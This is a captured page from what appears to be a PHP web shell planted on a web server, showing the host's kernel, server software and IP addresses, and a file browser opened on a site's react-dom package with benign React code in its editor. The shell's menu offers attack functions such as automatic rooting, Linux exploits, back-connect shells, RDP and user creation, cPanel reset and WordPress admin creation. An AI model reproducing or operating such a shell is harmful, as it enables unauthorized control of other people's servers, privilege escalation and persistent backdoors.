Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
react-dom /
[ HOME SHELL ]
Name
Size
Permission
Action
cjs
[ DIR ]
dr-xr-xr-x
umd
[ DIR ]
dr-xr-xr-x
LICENSE
1.06
KB
-rw-rw-rw-
README.md
1.08
KB
-rw-rw-rw-
client.js
619
B
-rw-rw-rw-
index.js
1.33
KB
-rw-rw-rw-
package.json
1.32
KB
-rw-rw-rw-
profiling.js
1.33
KB
-rw-rw-rw-
server.browser.js
658
B
-rw-rw-rw-
server.js
58
B
-rw-rw-rw-
server.node.js
646
B
-rw-rw-rw-
test-utils.js
220
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : profiling.js
'use strict'; function checkDCE() { /* global __REACT_DEVTOOLS_GLOBAL_HOOK__ */ if ( typeof __REACT_DEVTOOLS_GLOBAL_HOOK__ === 'undefined' || typeof __REACT_DEVTOOLS_GLOBAL_HOOK__.checkDCE !== 'function' ) { return; } if (process.env.NODE_ENV !== 'production') { // This branch is unreachable because this function is only called // in production, but the condition is true only in development. // Therefore if the branch is still here, dead code elimination wasn't // properly applied. // Don't change the message. React DevTools relies on it. Also make sure // this message doesn't occur elsewhere in this function, or it will cause // a false positive. throw new Error('^_^'); } try { // Verify that the code above has been dead code eliminated (DCE'd). __REACT_DEVTOOLS_GLOBAL_HOOK__.checkDCE(checkDCE); } catch (err) { // DevTools shouldn't crash React, no matter what. // We should still report in case we break this code. console.error(err); } } if (process.env.NODE_ENV === 'production') { // DCE check should happen before ReactDOM bundle executes so that // DevTools can report bad minification during injection. checkDCE(); module.exports = require('./cjs/react-dom.profiling.min.js'); } else { module.exports = require('./cjs/react-dom.development.js'); }
Close